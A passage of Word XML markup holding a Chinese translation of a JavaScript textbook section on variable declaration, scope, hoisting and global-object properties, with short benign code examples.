    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i="ten";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="Zhong_Fu_De_Sheng_Ming_He_Yi_Lou_De_Shen"/>
      <w:r>
        <w:t>重复的声明和遗漏的声明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句重复声明变量是合法且无害的。如果重复声明带有初始化器，那么这就和一条简单的赋值语句没什么两样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你试图读取一个没有声明的变量的值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会报错。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）中，给一个没有声明的变量赋值也会报错。然而从历史上讲，在非严格模式下，如果给一个未</w:t>
      </w:r>
      <w:r>
        <w:t>声明的变量赋值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实际上会给全局对象创建一个同名属性，并且它工作起来像（但并不完全一样，查看</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）一个正确声明的全局变量。这意味着你可以侥幸不声明全局变量。但这是一个不好的习惯并会造成很多</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，因此，你应当始终使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>来声明变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="3_10_Bian_Liang_Zuo_Yong_Yu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　变量作用域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个变量的作用域（</w:t>
      </w:r>
      <w:r>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:t>）是程序源代码中定义这个变量的区域。全局变量拥有全局作用域，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中的任何地方都是有定义的。然而在函数内声明的变量只在函数体内有定义。它们是局部变量，作用域是局部性的。函数参数也</w:t>
      </w:r>
      <w:r>
        <w:t>是局部变量，它们只在函数体内有定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在函数体内，局部变量的优先级高于同名的全局变量。如果在函数内声明的一个局部变量或者函数参数中带有的变量和全局变量重名，那么全局变量就被局部变量所遮盖。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="global";//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function checkscope(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个同名的局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return scope;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回局部变量的值，而不是全局变量的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>checkscope()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"local"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管在全局作用域编写代码时可以不写</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句，但声明局部变量时则必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句。思考一下如果不这样做会怎样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>scope="global";//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个全局变量，甚至不用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>来声明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function checkscope2(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>scope="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>糟糕！我们刚修改了全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>myscope="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>这里显式地声明了一个新的全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return[scope,myscope];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回两个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>checkscope2()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["local","local"]:</w:t>
      </w:r>
      <w:r>
        <w:t>产生了副作</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>scope//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"local":</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量修改了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myscope//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"local":</w:t>
      </w:r>
      <w:r>
        <w:t>全局命名空间搞乱了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数定义是可以嵌套的。由于每个函数都有它自己的作用域，因此会出现几个局部作用域嵌套的情况，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="global scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function checkscope(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="local scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function nested(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="nested scope";//</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套作用域内的局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>retur</w:t>
      </w:r>
      <w:r>
        <w:t>n scope;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回当前作用域内的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return nested();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>checkscope()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套作用域</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="3_10_1_Han_Shu_Zuo_Yong_Yu_He_Sheng_Ming"/>
      <w:r>
        <w:t>3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数作用域和声明提前</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在一些类似</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>语言的编程语言中，花括号内的每一段代码都具有各自的作用域，而且变量在声明它们的代码段之外是不可见的，我们称为块级作用域（</w:t>
      </w:r>
      <w:r>
        <w:t>block scope</w:t>
      </w:r>
      <w:r>
        <w:t>），而</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中没有块级作用域。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>取而代之地使用了函数作用域（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>sco</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pe</w:t>
      </w:r>
      <w:r>
        <w:t>）：变量在声明它们的函数体以及这个函数体嵌套的任意函数体内都是有定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在如下所示的代码中，在不同位置定义了变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>，它们都在同一个作用域内</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这三个变量在函数体内均是有定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function test(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0;//i</w:t>
      </w:r>
      <w:r>
        <w:t>在整个函数体内均是有定义的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof o=="object"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var j=0;//j</w:t>
      </w:r>
      <w:r>
        <w:t>在函数体内是有定义的，不仅仅是在这个代码段内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var k=0;k</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;k++){//k</w:t>
      </w:r>
      <w:r>
        <w:t>在函数体内是有定义的，不仅仅是在循环内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.lo</w:t>
      </w:r>
      <w:r>
        <w:t>g(k);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(k);//k</w:t>
      </w:r>
      <w:r>
        <w:t>已经定义了，输出</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(j);//j</w:t>
      </w:r>
      <w:r>
        <w:t>已经定义了，但可能没有初始化</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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的函数作用域是指在函数内声明的所有变量在函数体内始终是可见的。有意思的是，这意味着变量在声明之前甚至已经可用。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的这个特性被非正式地称为声明提前（</w:t>
      </w:r>
      <w:r>
        <w:t>hoisting</w:t>
      </w:r>
      <w:r>
        <w:t>），即</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数里声明的所有变量（但不涉及赋值）都被</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>至函数体的顶部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r>
        <w:t>，看一下如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope="gl</w:t>
      </w:r>
      <w:r>
        <w:t>obal";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(scope);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"undefined"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"global"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var scope="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>变量在这里赋初始值，但变量本身在函数体内任何地方均是有定义的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(scope);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"local"</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你可能会误以为函数中的第一行会输出</w:t>
      </w:r>
      <w:r>
        <w:t>"global"</w:t>
      </w:r>
      <w:r>
        <w:t>，因为代码还没有执行到</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句声明局部变量的地方。其实不然，由于函数作用域的特性，局部变量在整个函数体始终是有定义的，也就是说，在函数体内局部变量遮盖了同</w:t>
      </w:r>
      <w:r>
        <w:t>名全局变量。尽管如此，只有在程序执行到</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句的时候，局部变量才会被真正赋值。因此，上述过程等价于：将函数内的变量声明</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>至函数体顶部，同时变量初始化留在原来的位置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var scope;//</w:t>
      </w:r>
      <w:r>
        <w:t>在函数顶部声明了局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(scope);//</w:t>
      </w:r>
      <w:r>
        <w:t>变量存在，但其值是</w:t>
      </w:r>
      <w:r>
        <w:t>"undefined"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>scope="local";//</w:t>
      </w:r>
      <w:r>
        <w:t>这里将其初始化并赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(scope);//</w:t>
      </w:r>
      <w:r>
        <w:t>这里它具有了我们所期望的值</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在具有块级作用域的编程语言中，在狭小的作用域里让变量声明和使用变量的代码尽可能靠近彼此，通常来讲，这是一个非常不错的编程习惯。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>没有块级作用域，因此一些程序员特意将变量声明放在函数体顶部，而不是将声明靠近放在使用变量</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>之处。这种做法使得他们的源代码非常清晰地反映了真实的变量作用域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="3_10_2_Zuo_Wei_Shu_Xing_De_Bian_Liang_"/>
      <w:r>
        <w:t>3.10.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为属性的变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当声明一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量时，实际上是定义了全局对象的一个属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）。当使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个变量时，创建的这个属性是不可配置的（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节），也就是说这个变量无</w:t>
      </w:r>
      <w:r>
        <w:t>法通过</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符删除。可能你已经注意到了，如果你没有使用严格模式并给一个未声明的变量赋值的话，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动创建一个全局变量。以这种方式创建的变量是全局对象的正常的可配值属性，并可以删除它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var truevar=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个不可删除的全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fakevar=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>创建全局对象的一个可删除的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.fakevar2=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>同上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete truevar//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>变量并没有被删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete fakevar//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>变量被删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">delete </w:t>
      </w:r>
      <w:r>
        <w:t>this.fakevar2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>变量被删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
